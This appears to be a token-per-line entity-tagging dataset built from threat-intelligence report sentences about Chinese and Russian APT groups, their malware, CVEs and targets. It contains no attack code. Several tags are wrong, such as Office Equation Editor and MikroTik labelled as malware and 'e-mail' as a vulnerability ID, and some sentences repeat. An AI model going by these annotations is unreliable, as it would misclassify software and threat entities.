+[company] O
+login O
+" O
+, O
+which O
+directed O
+them O
+to O
+the O
+landing O
+page O
+for O
+remote O
+access O
+. O
+
+TG-3390 S-APT
+actors O
+keep O
+track O
+of O
+and O
+leverage O
+existing O
+ASPXTool B-MAL
+web I-MAL
+shells E-MAL
+in O
+their O
+operations O
+, O
+preferring O
+to O
+issue O
+commands O
+via O
+an O
+internally O
+accessible O
+Web B-TOOL
+shell E-TOOL
+rather O
+than O
+HTTPBrowser S-MAL
+or O
+PlugX S-MAL
+. O
+
+Within O
+six O
+hours O
+of O
+entering O
+the O
+environment O
+, O
+the O
+threat O
+actors O
+compromised O
+multiple O
+systems O
+and O
+stole O
+credentials O
+for O
+the O
+entire O
+domain O
+. O
+
+Despite O
+multiple O
+public O
+disclosures O
+of O
+their O
+activities S-ACT
+, O
+BRONZE O
+UNION O
+remains O
+an O
+active O
+and O
+formidable O
+threat O
+as O
+of O
+this O
+publication O
+. O
+
+In O
+2015 S-TIME
+, O
+the O
+SecureWorks® B-SECTEAM
+Counter I-SECTEAM
+Threat I-SECTEAM
+Unit™ E-SECTEAM
+( O
+CTU S-SECTEAM
+) O
+research O
+team O
+documented O
+the O
+BRONZE O
+UNION O
+threat O
+group O
+( O
+formerly O
+labeled O
+TG-3390 S-APT
+) O
+, O
+which O
+CTU™ S-SECTEAM
+analysis O
+suggests O
+is O
+based O
+in O
+the O
+People's B-IDTY
+Republic I-IDTY
+of I-IDTY
+China E-IDTY
+( O
+PRC S-IDTY
+) O
+. O
+
+After O
+reestablishing O
+access O
+, O
+the O
+adversaries O
+download O
+tools O
+such O
+as O
+gsecudmp S-MAL
+and O
+WCE S-MAL
+that O
+are O
+staged O
+temporarily O
+on O
+websites O
+that O
+TG-3390 S-APT
+previously O
+compromised O
+but O
+never O
+used O
+. O
+
+In O
+2015 S-TIME
+, O
+the O
+SecureWorks S-SECTEAM
+documented O
+the O
+BRONZE B-APT
+UNION E-APT
+threat O
+group O
+( O
+formerly O
+labeled O
+TG-3390 S-APT
+) O
+, O
+which O
+CTU S-SECTEAM
+analysis O
+suggests O
+is O
+based O
+in O
+the O
+People's B-IDTY
+Republic E-IDTY
+of O
+China S-LOC
+( O
+PRC E-IDTY
+) O
+. O
+
+BRONZE B-ACT
+UNION I-ACT
+threat I-ACT
+campaigns E-ACT
+that O
+illustrate O
+the O
+evolution O
+of O
+the O
+group O
+'s O
+methods O
+and O
+espionage O
+objectives O
+. O
+
+Based O
+on O
+BRONZE O
+UNION O
+'s O
+targeting O
+activity O
+, O
+CTU S-SECTEAM
+researchers O
+assess O
+it O
+is O
+highly O
+likely O
+that O
+the O
+group O
+focuses O
+on O
+political S-IDTY
+and O
+defense B-IDTY
+organization E-IDTY
+networks O
+. O
+
+this O
+SWC S-ACT
+was O
+used O
+to O
+specifically O
+target O
+Turkish O
+. O
+
+In O
+2016 S-TIME
+, O
+the O
+threat O
+actors O
+conducted O
+a O
+strategic B-ACT
+web I-ACT
+compromise E-ACT
+( O
+SWC S-ACT
+) O
+on O
+the O
+website O
+of O
+an O
+international B-IDTY
+industry I-IDTY
+organization E-IDTY
+that O
+affected O
+aerospace S-IDTY
+, O
+academic S-IDTY
+, O
+media S-IDTY
+, O
+technology S-IDTY
+, O
+government S-IDTY
+, O
+and O
+utilities B-IDTY
+organizations E-IDTY
+around O
+the O
+world O
+. O
+
+In O
+addition O
+, O
+BRONZE B-ACT
+UNION I-ACT
+activity E-ACT
+on O
+multiple O
+U.S.-based B-IDTY
+defense E-IDTY
+manufacturer O
+networks O
+included O
+the O
+threat O
+actors O
+seeking O
+information O
+associated O
+with O
+aerospace B-IDTY
+technologies E-IDTY
+, O
+combat B-IDTY
+processes E-IDTY
+, O
+and O
+naval B-IDTY
+defense I-IDTY
+systems E-IDTY
+. O
+
+this O
+SWC S-ACT
+was O
+used O
+to O
+specifically O
+target O
+Turkish B-LOC
+goverment E-LOC
+. O
+
+Since O
+that O
+analysis O
+, O
+CTU S-SECTEAM
+researchers O
+have O
+observed O
+multiple O
+BRONZE B-ACT
+UNION I-ACT
+threat I-ACT
+campaigns E-ACT
+that O
+illustrate O
+the O
+evolution O
+of O
+the O
+group O
+'s O
+methods O
+and O
+espionage O
+objectives O
+. O
+
+this O
+SWC S-ACT
+was O
+used O
+to O
+specifically O
+target O
+Turkish O
+banking S-IDTY
+. O
+
+this O
+SWC S-ACT
+was O
+used O
+to O
+specifically O
+target O
+Turkish B-LOC
+academic I-LOC
+networks E-LOC
+. O
+
+BRONZE O
+UNION O
+has O
+consistently O
+demonstrated O
+the O
+capability O
+to O
+conduct O
+successful O
+large-scale O
+intrusions O
+against O
+high-profile O
+networks O
+and O
+systems O
+. O
+
+The O
+threat O
+actors O
+appear O
+to O
+be O
+able O
+to O
+create O
+and O
+leverage O
+multiple O
+SWCs S-MAL
+in O
+parallel O
+. O
+
+In O
+a O
+separate O
+incident O
+, O
+CTU S-SECTEAM
+researchers O
+identified O
+a O
+file O
+named O
+s.txt S-FILE
+, O
+which O
+is O
+consistent O
+with O
+the O
+output O
+of O
+the O
+Netview O
+host-enumeration O
+tool O
+. O
+
+BRONZE O
+UNION O
+actors O
+leveraged O
+initial O
+web B-ACT
+shell E-ACT
+access O
+on O
+Internet-facing O
+systems O
+to O
+conduct O
+internal O
+reconnaissance O
+. O
+
+BRONZE O
+UNION O
+appears O
+to O
+use O
+a O
+combination O
+of O
+self-registered O
+IP S-PROT
+addresses O
+and O
+commercial O
+VPN S-TOOL
+services O
+in O
+its O
+command O
+and O
+control O
+( O
+C2 S-TOOL
+) O
+and O
+operational O
+infrastructure O
+. O
+
+This O
+script O
+relays O
+commands O
+and O
+output O
+between O
+the O
+controller O
+and O
+the O
+system O
+. O
+
+The O
+threat O
+actors O
+used O
+the O
+appcmd O
+command-line O
+tool O
+to O
+unlock O
+and O
+disable O
+the O
+default O
+logging O
+component O
+on O
+the O
+server O
+( O
+systsm.webServer/httplogging S-TOOL
+) O
+and O
+then O
+delete O
+existing O
+logs O
+from O
+the O
+system O
+( O
+see O
+Figure O
+4 O
+) O
+. O
+
+In O
+2016 S-TIME
+, O
+CTU S-SECTEAM
+researchers O
+observed O
+the O
+group O
+using O
+native O
+system O
+. O
+
+In O
+March B-TIME
+2018 E-TIME
+we O
+detected O
+an O
+ongoing O
+campaign O
+. O
+
+TG-3390 O
+'s O
+activities S-ACT
+indicate O
+a O
+preference O
+for O
+leveraging B-ACT
+SWCs E-ACT
+and O
+scan-and-exploit B-ACT
+techniques E-ACT
+to O
+compromise O
+target O
+systems O
+. O
+
+As O
+of O
+this O
+publication O
+, O
+BRONZE O
+UNION O
+remains O
+a O
+formidable O
+threat O
+group O
+that O
+targets O
+intellectual O
+property O
+and O
+executes O
+its O
+operations O
+at O
+a O
+swift O
+pace O
+. O
+
+we O
+detected O
+an O
+ongoing O
+campaign O
+targeting O
+a O
+national O
+data O
+center O
+. O
+
+The O
+operators O
+used O
+the O
+HyperBro B-MAL
+Trojan E-MAL
+as O
+their O
+last-stage O
+in-memory O
+remote B-MAL
+administration I-MAL
+tool E-MAL
+( O
+RAT S-MAL
+) O
+. O
+
+we O
+detected O
+an O
+ongoing O
+campaign O
+targeting O
+a O
+national O
+data O
+center O
+in O
+the O
+Centeral B-LOC
+Asia E-LOC
+. O
+
+The O
+tools O
+found O
+in O
+this O
+campaign O
+, O
+such O
+as O
+the O
+HyperBro B-MAL
+Trojan E-MAL
+, O
+are O
+regularly O
+used O
+by O
+a O
+variety O
+of O
+Chinese-speaking S-LOC
+actors O
+. O
+
+Due O
+to O
+tools O
+and O
+tactics O
+in O
+use O
+we O
+attribute O
+the O
+campaign O
+to O
+LuckyMouse S-APT
+Chinese-speaking O
+actor O
+( O
+also O
+known O
+as O
+EmissaryPanda S-APT
+and O
+APT27 S-APT
+) O
+. O
+
+It's O
+possible O
+TG-3390 S-APT
+used O
+a O
+waterhole S-ACT
+to O
+infect O
+data B-IDTY
+center I-IDTY
+employees E-IDTY
+. O
+
+Even O
+when O
+we O
+observed O
+LuckyMouse O
+using O
+weaponized O
+documents O
+with O
+CVE-2017-11882 S-VULID
+( O
+Microsoft B-MAL
+Office I-MAL
+Equation I-MAL
+Editor E-MAL
+, O
+widely O
+used O
+by O
+Chinese-speaking O
+actors O
+since O
+December B-TIME
+2017 E-TIME
+) O
+, O
+we O
+can′t O
+prove O
+they O
+were O
+related O
+to O
+this O
+particular O
+attack O
+. O
+
+We O
+suspect O
+this O
+router S-MAL
+was O
+hacked O
+as O
+part O
+of O
+the O
+campaign O
+in O
+order O
+to O
+process O
+the O
+malware O
+'s O
+HTTP S-PROT
+requests O
+. O
+
+In O
+March B-TIME
+2017 E-TIME
+, O
+Wikileaks S-SECTEAM
+published O
+details O
+about O
+an O
+exploit S-VULNAME
+affecting O
+Mikrotik S-MAL
+called O
+ChimayRed S-MAL
+. O
+
+There O
+were O
+traces O
+of O
+HyperBro S-MAL
+in O
+the O
+infected O
+data O
+center O
+from O
+mid-November B-TIME
+2017 E-TIME
+. O
+
+In O
+March B-TIME
+2017 E-TIME
+, O
+Wikileaks S-SECTEAM
+published O
+details O
+about O
+an O
+exploit S-VULNAME
+affecting O
+Mikrotik S-MAL
+called O
+ChimayRed S-MAL
+. O
+
+This O
+is O
+a O
+hacking O
+group O
+with O
+Chinese B-LOC
+origins E-LOC
+which O
+targets O
+selected O
+organisations O
+related O
+with O
+education S-IDTY
+, O
+energy S-IDTY
+and O
+technology S-IDTY
+. O
+
+Usually O
+, O
+the O
+delivered O
+payload O
+is O
+either O
+the O
+well-known O
+' O
+PlugX S-MAL
+' O
+or O
+' O
+HTTPBrowser S-MAL
+' O
+RAT S-MAL
+, O
+a O
+tool O
+which O
+is O
+believed O
+to O
+have O
+Chinese B-LOC
+origins E-LOC
+and O
+to O
+be O
+used O
+only O
+by O
+certain O
+Chinese B-LOC
+hacking I-LOC
+groups E-LOC
+. O
+
+Emissary O
+Panda O
+has O
+used O
+many O
+ACTs O
+with O
+the O
+most O
+notable O
+being O
+the O
+exploits O
+from O
+the O
+Hacking O
+Team O
+leak O
+. O
+
+Emissary O
+Panda O
+is O
+still O
+active O
+and O
+continues O
+to O
+target O
+selected O
+organisations O
+. O
+
+Cybersecurity S-SECTEAM
+researchers O
+have O
+uncovered O
+an O
+espionage B-ACT
+campaign E-ACT
+that O
+has O
+targeted O
+a O
+national O
+data O
+center O
+of O
+an O
+unnamed O
+central B-LOC
+Asian E-LOC
+country O
+in O
+order O
+to O
+conduct O
+watering B-ACT
+hole I-ACT
+attacks E-ACT
+. O
+
+The O
+campaign O
+is O
+believed O
+to O
+be O
+active O
+covertly O
+since O
+fall O
+2017 S-TIME
+. O
+
+LuckyMouse S-APT
+, O
+also O
+known O
+as O
+Iron B-APT
+Tiger E-APT
+, O
+EmissaryPanda S-APT
+, O
+APT B-APT
+27 E-APT
+and O
+Threat B-APT
+Group-3390 E-APT
+, O
+is O
+the O
+same O
+group O
+of O
+Chinese B-LOC
+hackers E-LOC
+who O
+was O
+found O
+targeting O
+Asian B-LOC
+countries E-LOC
+with O
+Bitcoin B-MAL
+mining I-MAL
+malware E-MAL
+early O
+this O
+year O
+. O
+
+March S-TIME
+by O
+security O
+researchers O
+from O
+Kaspersky B-SECTEAM
+Labs E-SECTEAM
+. O
+
+For O
+example O
+, O
+at O
+the O
+end O
+of O
+2016 S-TIME
+CTU S-SECTEAM
+researchers O
+observed O
+the O
+threat O
+actors O
+using O
+native O
+system O
+functionality O
+to O
+disable O
+logging O
+processes O
+and O
+delete O
+logs O
+within O
+a O
+network O
+. O
+
+The O
+group O
+has O
+been O
+active O
+since O
+at O
+least O
+2010 S-TIME
+and O
+was O
+behind O
+many O
+previous O
+attack B-ACT
+campaigns E-ACT
+resulting O
+in O
+the O
+theft O
+of O
+massive O
+amounts O
+of O
+data O
+from O
+the O
+directors O
+and O
+managers O
+of O
+US-based O
+defense B-IDTY
+contractors E-IDTY
+. O
+
+attacks O
+to O
+a O
+Chinese-speaking B-LOC
+threat I-LOC
+actor I-LOC
+group E-LOC
+called O
+LuckyMouse O
+. O
+
+LuckyMouse O
+has O
+been O
+spotted O
+using O
+a O
+widely O
+used O
+Microsoft B-TOOL
+Office E-TOOL
+vulnerability O
+( O
+CVE-2017-11882 S-VULID
+) O
+. O
+
+This O
+time O
+the O
+group O
+chose O
+a O
+national O
+data O
+center O
+as O
+its O
+target O
+from O
+an O
+unnamed O
+country O
+in O
+Central B-LOC
+Asia E-LOC
+in O
+an O
+attempt O
+to O
+gain O
+" O
+access O
+to O
+a O
+wide O
+range O
+of O
+government O
+resources O
+at O
+one O
+fell O
+swoop O
+" O
+. O
+
+The O
+initial O
+attack O
+vector O
+used O
+in O
+the O
+attack O
+against O
+the O
+data O
+center O
+is O
+unclear O
+, O
+but O
+researchers O
+believe O
+LuckyMouse S-APT
+possibly O
+had O
+conducted O
+watering B-ACT
+hole E-ACT
+or O
+phishing B-ACT
+attacks E-ACT
+to O
+compromise O
+accounts O
+belonging O
+to O
+employees S-IDTY
+at O
+the O
+national O
+data O
+center O
+. O
+
+According O
+to O
+the O
+researchers O
+, O
+the O
+group O
+injected O
+malicious O
+JavaScript B-MAL
+code E-MAL
+into O
+the O
+official O
+government O
+websites O
+associated O
+with O
+the O
+data O
+center O
+in O
+order O
+to O
+conduct O
+watering B-ACT
+hole I-ACT
+attacks E-ACT
+. O
+
+the O
+targeted O
+system O
+with O
+a O
+piece O
+of O
+malware O
+called O
+HyperBro S-MAL
+, O
+a O
+Remote B-MAL
+Access I-MAL
+Trojan E-MAL
+( O
+RAT S-MAL
+) O
+. O
+
+The O
+main O
+command O
+and O
+control O
+( O
+C&C S-TOOL
+) O
+server O
+used O
+in O
+this O
+attack O
+is O
+hosted O
+on O
+an O
+IP S-PROT
+address O
+which O
+belongs O
+to O
+a O
+Ukrainian O
+ISP O
+, O
+specifically O
+to O
+a O
+MikroTik S-MAL
+router O
+running O
+a O
+firmware O
+version O
+released O
+in O
+March B-TIME
+2016 E-TIME
+. O
+
+the O
+targets O
+of O
+the O
+hacking O
+group O
+were O
+in O
+the O
+automotive S-IDTY
+. O
+
+Dell B-SECTEAM
+SecureWorks E-SECTEAM
+researchers O
+unveiled O
+a O
+report O
+on O
+Threat O
+Group-3390 S-APT
+that O
+has O
+targeted O
+companies O
+around O
+the O
+world O
+while O
+stealing O
+massive O
+amounts O
+of O
+industrial O
+data O
+. O
+
+The O
+group O
+, O
+believed O
+to O
+be O
+based O
+in O
+China S-LOC
+, O
+has O
+also O
+targeted O
+defense B-IDTY
+contractors E-IDTY
+, O
+colleges S-IDTY
+and O
+universities S-IDTY
+, O
+law B-IDTY
+firms E-IDTY
+, O
+and O
+political B-IDTY
+organizations E-IDTY
+— O
+including O
+organizations O
+related O
+to O
+Chinese O
+minority B-IDTY
+ethnic I-IDTY
+groups E-IDTY
+. O
+
+LAS O
+VEGAS—Today O
+at O
+the O
+Black O
+Hat O
+information O
+security O
+conference O
+, O
+Dell B-SECTEAM
+SecureWorks E-SECTEAM
+researchers O
+unveiled O
+a O
+report O
+on O
+a O
+newly O
+detected O
+hacking O
+group O
+that O
+has O
+targeted O
+companies O
+around O
+the O
+world O
+while O
+stealing O
+massive O
+amounts O
+of O
+industrial O
+data O
+. O
+
+Designated O
+as O
+Threat B-APT
+Group I-APT
+3390 E-APT
+and O
+nicknamed O
+" O
+Emissary B-APT
+Panda E-APT
+" O
+by O
+researchers O
+, O
+the O
+hacking O
+group O
+has O
+compromised O
+victims' O
+networks O
+largely O
+through O
+" O
+watering B-ACT
+hole E-ACT
+" O
+attacks O
+launched O
+from O
+over O
+100 O
+compromised O
+legitimate O
+websites O
+, O
+sites O
+picked O
+because O
+they O
+were O
+known O
+to O
+be O
+frequented O
+by O
+those O
+targeted O
+in O
+the O
+attack O
+. O
+
+the O
+United S-LOC
+Kingdom S-LOC
+had O
+data O
+stolen O
+by O
+members O
+of O
+Emissary B-APT
+Panda E-APT
+. O
+
+the O
+US S-LOC
+had O
+data O
+stolen O
+by O
+members O
+of O
+Emissary B-APT
+Panda E-APT
+. O
+
+No O
+zero-day S-VULNAME
+vulnerabilities O
+were O
+used O
+to O
+breach O
+targeted O
+networks O
+, O
+instead O
+" O
+TG-3390 O
+relied O
+on O
+old O
+vulnerabilities O
+such O
+as O
+CVE-2011-3544 S-VULID
+" O
+— O
+a O
+near-year-old O
+Java O
+security O
+hole O
+— O
+" O
+and O
+CVE-2010-0738 S-VULID
+to O
+compromise O
+their O
+targets O
+" O
+, O
+Dell B-SECTEAM
+SecureWorks' E-SECTEAM
+researchers O
+reported O
+. O
+
+The O
+group O
+used O
+a O
+number O
+of O
+tools O
+common O
+to O
+other O
+Chinese B-LOC
+hacking I-LOC
+groups E-LOC
+, O
+but O
+they O
+had O
+a O
+few O
+unique O
+tools O
+of O
+their O
+own O
+with O
+interfaces O
+developed O
+for O
+Standard O
+( O
+Simplified O
+) O
+Chinese S-LOC
+. O
+
+If O
+the O
+address O
+falls O
+within O
+ranges O
+that O
+the O
+attackers O
+are O
+interested O
+in O
+, O
+the O
+malicious O
+site O
+waits O
+for O
+their O
+next O
+page O
+view O
+to O
+drop O
+an O
+exploit S-VULNAME
+on O
+the O
+desirable O
+target O
+'s O
+PC O
+. O
+
+Visitors O
+to O
+sites O
+exploited O
+by O
+Emissary O
+Panda O
+are O
+directed O
+by O
+code O
+embedded O
+in O
+the O
+sites O
+to O
+a O
+malicious O
+webpage O
+, O
+which O
+screens O
+their O
+IP S-PROT
+address O
+. O
+
+There O
+has O
+also O
+been O
+at O
+least O
+one O
+victim O
+targeted O
+by O
+a O
+spear-phishing S-ACT
+attack E-ACT
+. O
+
+A O
+variety O
+of O
+malware O
+, O
+including O
+the O
+PlugX B-MAL
+tool E-MAL
+, O
+was O
+shared O
+with O
+other O
+known O
+Chinese B-LOC
+threat I-LOC
+groups E-LOC
+. O
+
+Once O
+inside O
+networks O
+, O
+the O
+group O
+generally O
+targeted O
+Windows S-OS
+network O
+domain O
+controllers O
+and O
+Exchange O
+e-mail B-ACT
+servers E-ACT
+, O
+targeting O
+user O
+credentials O
+to O
+allow O
+them O
+to O
+move O
+to O
+other O
+systems O
+throughout O
+the O
+targeted O
+network O
+. O
+
+They O
+used O
+an O
+exploit S-VULNAME
+of O
+Internet O
+Information O
+Server O
+to O
+inject O
+keylogger S-MAL
+and O
+backdoor S-MAL
+malware S-MAL
+onto O
+the O
+Exchange O
+server O
+. O
+
+But O
+two O
+tools O
+used O
+were O
+unique O
+to O
+the O
+group O
+: O
+ASPXTool S-MAL
+, O
+an O
+Internet B-TOOL
+Information I-TOOL
+Services E-TOOL
+( O
+IIS S-TOOL
+) O
+specific O
+" O
+Web B-TOOL
+shell E-TOOL
+" O
+used O
+to O
+gain O
+access O
+to O
+servers O
+inside O
+a O
+target O
+'s O
+network O
+; O
+and O
+the O
+OwaAuth S-APT
+credential O
+stealing O
+tool O
+and O
+Web B-TOOL
+shell E-TOOL
+, O
+used O
+to O
+attack O
+Microsoft S-IDTY
+Exchange O
+servers O
+running O
+the O
+Web O
+Outlook S-TOOL
+interface O
+. O
+
+By O
+using O
+such O
+features O
+and O
+tools O
+, O
+attackers O
+are O
+hoping O
+to O
+blend O
+in O
+on O
+the O
+victim O
+'s O
+network O
+and O
+hide O
+their O
+activity O
+in O
+a O
+sea O
+of O
+legitimate O
+processes O
+. O
+
+TAA S-SECTEAM
+leverages O
+advanced O
+artificial O
+intelligence O
+and O
+machine O
+learning O
+that O
+combs O
+through O
+Symantec S-SECTEAM
+'s O
+data O
+lake O
+of O
+telemetry O
+in O
+order O
+to O
+spot O
+patterns O
+associated O
+with O
+targeted B-ACT
+attacks E-ACT
+. O
+
+January B-TIME
+2018 E-TIME
+, O
+TAA S-SECTEAM
+triggered O
+an O
+alert O
+at O
+a O
+large O
+telecoms B-IDTY
+operator E-IDTY
+in O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+Thrip O
+was O
+using O
+PsExec S-MAL
+to O
+move O
+laterally O
+between O
+computers O
+on O
+the O
+company O
+'s O
+network O
+. O
+
+TAA S-SECTEAM
+triggered O
+an O
+alert O
+at O
+a O
+large O
+telecoms B-IDTY
+operator E-IDTY
+in O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+AA O
+triggered O
+an O
+alert O
+at O
+a O
+large O
+telecoms B-IDTY
+operator E-IDTY
+in O
+Southeast O
+Asia O
+. O
+
+PsExec S-MAL
+is O
+a O
+Microsoft S-IDTY
+Sysinternals O
+tool O
+for O
+executing O
+processes O
+on O
+other O
+systems O
+and O
+is O
+one O
+of O
+the O
+most O
+frequently O
+seen O
+legitimate O
+pieces O
+of O
+software O
+used O
+by O
+attackers O
+attempting O
+to O
+live O
+off O
+the O
+land O
+. O
+
+TAA S-SECTEAM
+not O
+only O
+flagged O
+this O
+malicious O
+use O
+of O
+PsExec S-MAL
+, O
+it O
+also O
+told O
+us O
+what O
+the O
+attackers O
+were O
+using O
+it O
+for O
+. O
+
+Thrip O
+was O
+attempting O
+to O
+remotely O
+install O
+a O
+previously O
+unknown O
+piece O
+of O
+malware O
+( O
+Infostealer.Catchamas S-MAL
+) O
+on O
+computers O
+within O
+the O
+victim O
+'s O
+network O
+. O
+
+three O
+computers O
+in O
+China S-LOC
+being O
+used O
+to O
+launch O
+the O
+Thrip B-ACT
+attacks E-ACT
+. O
+
+Perhaps O
+the O
+most O
+worrying O
+discovery O
+we O
+made O
+was O
+that O
+Thrip O
+had O
+targeted O
+a O
+satellite B-IDTY
+communications I-IDTY
+operator E-IDTY
+. O
+
+Thrip O
+seemed O
+to O
+be O
+mainly O
+interested O
+in O
+the O
+operational O
+side O
+of O
+the O
+company O
+. O
+
+This O
+suggests O
+to O
+us O
+that O
+Thrip O
+'s O
+motives O
+go O
+beyond O
+spying O
+and O
+may O
+also O
+include O
+disruption O
+. O
+
+Armed O
+with O
+this O
+information O
+about O
+the O
+malware O
+and O
+living O
+off O
+the O
+land B-ACT
+tactics E-ACT
+being O
+used O
+by O
+this O
+group O
+of O
+attackers O
+whom O
+we O
+named O
+Thrip O
+, O
+we O
+broadened O
+our O
+search O
+to O
+see O
+if O
+we O
+could O
+find O
+similar O
+patterns O
+that O
+indicated O
+Thrip O
+had O
+been O
+targeting O
+other O
+organizations O
+. O
+
+The O
+group O
+had O
+also O
+targeted O
+three O
+different O
+telecoms B-IDTY
+operators E-IDTY
+, O
+all O
+based O
+in O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+In O
+all O
+cases O
+, O
+based O
+on O
+the O
+nature O
+of O
+the O
+computers O
+infected O
+by O
+Thrip O
+, O
+it O
+appeared O
+that O
+the O
+telecoms B-IDTY
+companies E-IDTY
+themselves O
+and O
+not O
+their O
+customers S-IDTY
+were O
+the O
+targets O
+of O
+these O
+attacks O
+. O
+
+Catchamas S-FILE
+is O
+a O
+custom O
+Trojan S-MAL
+designed O
+to O
+steal O
+information O
+from O
+an O
+infected O
+computer O
+and O
+contains O
+additional O
+features O
+designed O
+to O
+avoid O
+detection O
+. O
+
+Many O
+of O
+the O
+tools O
+they O
+use O
+now O
+feature O
+new O
+behaviors O
+, O
+including O
+a O
+change O
+in O
+the O
+ACT O
+they O
+maintain O
+a O
+foothold O
+in O
+the O
+targeted O
+network O
+. O
+
+Execute O
+a O
+command O
+through O
+exploits O
+for O
+CVE-2017-11882 S-VULID
+. O
+
+Execute O
+a O
+command O
+through O
+exploits O
+for O
+CVE-2018-0802 S-VULID
+. O
+
+The O
+backdoor O
+will O
+load O
+the O
+encrypted O
+configuration O
+file O
+and O
+decrypt O
+it O
+, O
+then O
+use O
+Secure B-PROT
+Sockets I-PROT
+Layer E-PROT
+( O
+SSL S-PROT
+) O
+protocol O
+to O
+connect O
+to O
+command-and-control S-TOOL
+( O
+C&C S-TOOL
+) O
+servers O
+. O
+
+TClient S-MAL
+is O
+actually O
+one O
+of O
+Tropic O
+Trooper O
+'s O
+other O
+backdoors O
+. O
+
+The O
+malicious O
+loader O
+will O
+use O
+dynamic-link B-TOOL
+library E-TOOL
+( O
+DLL S-TOOL
+) O
+hijacking O
+— O
+injecting O
+malicious O
+code O
+into O
+a O
+process O
+of O
+a O
+file/application O
+— O
+on O
+sidebar.exe S-FILE
+and O
+launch O
+dllhost.exe S-FILE
+( O
+a O
+normal O
+file O
+) O
+. O
+
+TClient S-MAL
+, O
+for O
+instance O
+, O
+uses O
+DLL B-ACT
+hijacking I-ACT
+and I-ACT
+injection E-ACT
+that O
+may O
+not O
+be O
+as O
+noticeable O
+to O
+others O
+. O
+
+The O
+backdoor O
+noted O
+by O
+other O
+security O
+researchers O
+was O
+encoded O
+with O
+different O
+algorithms O
+and O
+configured O
+with O
+different O
+parameter O
+names O
+in O
+2016 S-TIME
+, O
+for O
+instance O
+. O
+
+Taiwan S-LOC
+has O
+been O
+a O
+regular O
+target O
+of O
+Cyber B-ACT
+Espionage E-ACT
+threat O
+actors O
+for O
+a O
+number O
+of O
+years O
+. O
+
+In O
+early O
+August S-TIME
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+identified O
+two O
+attacks O
+using O
+similar O
+techniques O
+. O
+
+which O
+has O
+been O
+active O
+since O
+at O
+least O
+2011 S-TIME
+. O
+
+One O
+of O
+the O
+attacks O
+used O
+Tropic O
+Trooper O
+'s O
+known O
+Yahoyah S-MAL
+malware S-MAL
+, O
+but O
+the O
+other O
+attack O
+deployed O
+the O
+widely O
+available O
+Poison B-ACT
+Ivy I-ACT
+RAT E-ACT
+. O
+
+This O
+confirms O
+the O
+actors O
+are O
+using O
+Poison B-MAL
+Ivy E-MAL
+as O
+part O
+of O
+their O
+toolkit O
+, O
+something O
+speculated O
+in O
+the O
+original O
+Trend B-SECTEAM
+Micro E-SECTEAM
+report O
+but O
+not O
+confirmed O
+by O
+them O
+. O
+
+The O
+document O
+attached O
+to O
+this O
+e-mail B-VULID
+exploits S-VULNAME
+CVE-2012-0158 S-VULID
+. O
+
+As O
+we O
+have O
+noted O
+in O
+many O
+earlier O
+reports O
+, O
+attackers O
+commonly O
+use O
+decoy B-FILE
+files E-FILE
+to O
+trick O
+victims O
+into O
+thinking O
+a O
+malicious O
+document O
+is O
+actually O
+legitimate O
+. O
+
+Further O
+analysis O
+uncovered O
+a O
+handful O
+of O
+ties O
+indicating O
+the O
+actors O
+may O
+also O
+be O
+using O
+the O
+PCShare B-MAL
+malware I-MAL
+family E-MAL
+, O
+which O
+has O
+not O
+been O
+previously O
+tied O
+to O
+the O
+group O
+. O
+
+This O
+matches O
+with O
+known O
+Tactics O
+, O
+Techniques O
+, O
+and O
+Procedures O
+( O
+TTPs O
+) O
+for O
+Tropic B-APT
+Trooper E-APT
+, O
+targeting O
+both O
+government B-IDTY
+institutions E-IDTY
+and O
+also O
+the O
+energy B-IDTY
+industry E-IDTY
+in O
+Taiwan O
+. O
+
+Tropic B-APT
+Trooper E-APT
+is O
+also O
+still O
+exploiting O
+CVE-2012-0158 S-VULID
+, O
+as O
+are O
+many O
+threat O
+actors O
+. O
+
+The O
+Tropic B-APT
+Trooper I-APT
+threat I-APT
+actor I-APT
+group E-APT
+has O
+been O
+known O
+to O
+target O
+governments S-IDTY
+and O
+organizations O
+in O
+the O
+Asia B-LOC
+Pacific E-LOC
+region O
+for O
+at O
+least O
+six O
+years O
+. O
+
+Turla S-APT
+is O
+a O
+notorious O
+group O
+that O
+has O
+been O
+targeting O
+governments S-IDTY
+. O
+
+Turla S-APT
+is O
+known O
+to O
+run O
+watering B-ACT
+hole E-ACT
+and O
+spearphishing B-ACT
+campaigns E-ACT
+to O
+better O
+pinpoint O
+their O
+targets O
+. O
+
+Turla S-APT
+is O
+a O
+notorious O
+group O
+that O
+has O
+been O
+targeting O
+government B-IDTY
+officials E-IDTY
+. O
+
+The O
+documents S-FILE
+attached O
+to O
+spear-phishing S-ACT
+e-mails E-ACT
+used O
+in O
+both O
+attacks O
+contain O
+code O
+that O
+exploits O
+CVE-2012-0158 S-VULID
+, O
+which O
+despite O
+its O
+age O
+remains O
+one O
+of O
+the O
+most O
+common O
+Microsoft B-TOOL
+Word E-TOOL
+vulnerabilities S-VULNAME
+being O
+exploited O
+by O
+multiple O
+threat O
+actors O
+. O
+
+Turla S-APT
+is O
+a O
+notorious O
+group O
+that O
+has O
+been O
+targeting O
+diplomats S-IDTY
+. O
+
+The O
+codename O
+for O
+Turla B-APT
+APT I-APT
+group E-APT
+in O
+this O
+presentation O
+is O
+MAKERSMARK O
+. O
+
+The O
+Intercept O
+reported O
+that O
+there O
+exists O
+a O
+2011 S-TIME
+presentation O
+by O
+Canada B-IDTY
+'s I-IDTY
+Communication I-IDTY
+Security I-IDTY
+Establishment E-IDTY
+( O
+CSE S-IDTY
+) O
+outlining O
+the O
+errors O
+made O
+by O
+the O
+Turla S-APT
+operators O
+during O
+their O
+operations O
+even O
+though O
+the O
+tools O
+they O
+use O
+are O
+quite O
+advanced O
+. O
+
+The O
+witnessed O
+techniques O
+, O
+tactics O
+and O
+procedures O
+( O
+TTPs O
+) O
+are O
+in-line O
+with O
+what O
+we O
+usuallysee O
+in O
+Turla B-APT
+'s I-APT
+operation E-APT
+: O
+a O
+first O
+stage B-ACT
+backdoor E-ACT
+, O
+such O
+as O
+Skipper S-MAL
+, O
+likely O
+delivered O
+through O
+spearphishing S-ACT
+followed O
+by O
+the O
+appearance O
+on O
+the O
+compromised O
+system O
+of O
+a O
+second O
+stage O
+backdoor O
+, O
+Gazerin O
+this O
+case O
+. O
+
+Southeastern B-LOC
+Europe E-LOC
+as O
+well O
+as O
+countries O
+in O
+the O
+former O
+Soviet B-LOC
+Union I-LOC
+Republichas E-LOC
+recently O
+been O
+the O
+main O
